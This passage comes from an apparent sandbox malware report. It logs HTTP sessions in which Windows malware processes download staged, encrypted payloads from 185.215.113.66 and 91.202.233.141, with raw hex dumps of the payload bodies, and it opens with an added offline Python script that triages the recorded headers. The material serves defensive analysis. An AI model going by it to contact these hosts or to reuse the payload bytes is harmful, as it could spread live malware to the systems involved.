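                                                                              The four 200 responses in sessions 43 to 46 are the downloader pulling staged payloads over plain HTTP from 185.215.113.66 (sessions 43 to 45 from C:\Windows\sysbrapsvc.exe with a Chrome/124 User-Agent, session 46 from the dropped 1146722911.exe with a Chrome/121 User-Agent). Two checks are worth running before touching the bodies: whether the nginx ETag agrees with the other headers (nginx derives it from the served file's mtime and size in hex, so it also dates when each payload was staged), and what the leading bytes look like (none of the four begins with MZ; /3 and /_1 both start with the 8-byte marker 4e 47 53 21 00 02 00 00). The script below is an added example and not part of the Joe Sandbox report: the session values and leading body bytes are transcribed from the report, the function and field names are the example's own, and the label "ngs-container" is only a correlation tag for that marker, not an identified file format.

```python
"""Triage of the payload downloads recorded in HTTP sessions 43-46.

Added example, not part of the sandbox report. All values below are copied
from the report (IPs, URIs, response headers, first 16 bytes of each body
as printed under "Data Raw"); nothing is fetched from the network.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


@dataclass
class Download:
    session: int
    process: str
    host: str
    uri: str
    headers: dict
    head: bytes  # leading bytes of the response body


# Sessions 43-46 as shown in the report (values transcribed, not captured live).
SESSIONS = [
    Download(43, r"C:\Windows\sysbrapsvc.exe", "185.215.113.66", "/1",
             {"Date": "Wed, 08 May 2024 13:25:26 GMT", "Content-Length": "101120",
              "Last-Modified": "Mon, 06 May 2024 15:20:46 GMT", "ETag": '"6638f54e-18b00"'},
             bytes.fromhex("2feb3bff228c9e7ed6fa861625d6a1eb")),
    Download(44, r"C:\Windows\sysbrapsvc.exe", "185.215.113.66", "/2",
             {"Date": "Wed, 08 May 2024 13:25:28 GMT", "Content-Length": "15104",
              "Last-Modified": "Wed, 24 Apr 2024 23:21:57 GMT", "ETag": '"66299415-3b00"'},
             bytes.fromhex("4be8231d0c9479421c1c4897497a96f6")),
    Download(45, r"C:\Windows\sysbrapsvc.exe", "185.215.113.66", "/3",
             {"Date": "Wed, 08 May 2024 13:25:31 GMT", "Content-Length": "81928",
              "Last-Modified": "Wed, 24 Apr 2024 23:29:53 GMT", "ETag": '"662995f1-14008"'},
             bytes.fromhex("4e47532100020000f701b2600c255836")),
    Download(46, r"C:\Users\user\AppData\Local\Temp\1146722911.exe", "185.215.113.66", "/_1",
             {"Date": "Wed, 08 May 2024 13:25:34 GMT", "Content-Length": "9224",
              "Last-Modified": "Wed, 08 May 2024 11:35:13 GMT", "ETag": '"663b6371-2408"'},
             bytes.fromhex("4e47532100020000ccda9cefc19697c6")),
]


def parse_nginx_etag(etag: str) -> tuple:
    """nginx's default ETag is '<hex mtime>-<hex size>' of the file on disk.
    Returns (mtime as unix seconds, size in bytes)."""
    mtime_hex, size_hex = etag.strip('"').split("-", 1)
    return int(mtime_hex, 16), int(size_hex, 16)


def etag_consistent(headers: dict) -> bool:
    """True when the ETag's size matches Content-Length and its mtime matches
    Last-Modified; a mismatch would mean the server is not plain nginx static
    serving and the ETag cannot be used to date the payload."""
    mtime, size = parse_nginx_etag(headers["ETag"])
    last_mod = parsedate_to_datetime(headers["Last-Modified"]).replace(tzinfo=timezone.utc)
    return size == int(headers["Content-Length"]) and mtime == int(last_mod.timestamp())


def classify_head(head: bytes) -> str:
    """Cheap first-bytes look at the body: a PE would start with MZ; the
    'NGS!' marker is what /3 and /_1 start with in this report (format not
    identified here, used only as a correlation tag); anything else is opaque."""
    if head[:2] == b"MZ":
        return "pe"
    if head[:4] == b"NGS!":
        return "ngs-container"
    return "opaque"


def triage(d: Download) -> dict:
    mtime, size = parse_nginx_etag(d.headers["ETag"])
    served_at = parsedate_to_datetime(d.headers["Date"]).replace(tzinfo=timezone.utc)
    staged_at = datetime.fromtimestamp(mtime, tz=timezone.utc)
    return {
        "session": d.session,
        "url": f"http://{d.host}{d.uri}",
        "process": d.process,
        "bytes": size,
        "etag_consistent": etag_consistent(d.headers),
        "staged_at": staged_at.isoformat(),
        # how long the file had been on the server when the sandbox fetched it
        "age_hours": round((served_at - staged_at).total_seconds() / 3600, 1),
        "head": classify_head(d.head),
    }


def triage_all(sessions=SESSIONS) -> list:
    return [triage(d) for d in sessions]


if __name__ == "__main__":
    for row in triage_all():
        print(row)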


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              46 | 192.168.2.8 | 49788 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:33.861295938 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:34.201303959 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:34 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes


Session ID: 47 | Source IP: 192.168.2.8 | Source Port: 49789 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 5588 | Process: C:\Windows\sysbrapsvc.exe

Timestamp: May 8, 2024 15:25:34.043001890 CEST | Bytes transferred: 166 | Direction: OUT | Data:
GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66

Timestamp: May 8, 2024 15:25:34.384295940 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:25:34 GMT
Content-Type: application/octet-stream
Content-Length: 22272
Last-Modified: Wed, 08 May 2024 11:20:38 GMT
Connection: keep-alive
ETag: "663b6006-5700"
Accept-Ranges: bytes


Session ID: 48 | Source IP: 192.168.2.8 | Source Port: 49790 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe

Timestamp: May 8, 2024 15:25:36.574939013 CEST | Bytes transferred: 167 | Direction: OUT | Data:
GET /_2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66

Timestamp: May 8, 2024 15:25:36.916764021 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:25:36 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Tue, 07 May 2024 18:30:40 GMT
Connection: keep-alive
ETag: "663a7350-2408"
Accept-Ranges: bytes


Session ID: 49 | Source IP: 192.168.2.8 | Source Port: 49791 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 5588 | Process: C:\Windows\sysbrapsvc.exe

Timestamp: May 8, 2024 15:25:36.746490955 CEST | Bytes transferred: 166 | Direction: OUT | Data:
GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66

Timestamp: May 8, 2024 15:25:37.087049007 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:25:36 GMT
Content-Type: application/octet-stream
Content-Length: 8960
Last-Modified: Mon, 06 May 2024 15:56:03 GMT
Connection: keep-alive
ETag: "6638fd93-2300"
Accept-Ranges: bytes


Session ID: 50 | Source IP: 192.168.2.8 | Source Port: 49792 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe

Timestamp: May 8, 2024 15:25:39.337002993 CEST | Bytes transferred: 167 | Direction: OUT | Data:
GET /_3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66

Timestamp: May 8, 2024 15:25:39.677988052 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:25:39 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Tue, 07 May 2024 18:30:44 GMT
Connection: keep-alive
ETag: "663a7354-2408"
Accept-Ranges: bytes
                                                                              May 8, 2024 15:25:39.678198099 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:39.678260088 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:39.678329945 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:39.678381920 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              51         | 192.168.2.8 | 49793       | 185.215.113.66 | 80               | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:39.484021902 CEST | 166 | OUT | GET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:39.822788954 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:39 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:25:39.822804928 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:25:39.822957039 CEST1289INData Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:25:39.822978020 CEST1289INData Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                              May 8, 2024 15:25:39.823371887 CEST1289INData Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                              May 8, 2024 15:25:39.823386908 CEST1289INData Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                              May 8, 2024 15:25:39.823712111 CEST1289INData Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                              May 8, 2024 15:25:39.823726892 CEST1289INData Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                              May 8, 2024 15:25:39.823790073 CEST1289INData Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                              May 8, 2024 15:25:39.823805094 CEST184INData Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              52         | 192.168.2.8 | 49794       | 91.202.233.141 | 80               | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:43.063368082 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:43.412086964 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:43 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:45.434943914 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:45.781805038 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:45 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:47.810445070 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:48.156766891 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              53         | 192.168.2.8 | 49795       | 91.202.233.141 | 80               | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:43.203051090 CEST | 166 | OUT | GET /1 HTTP/1.1
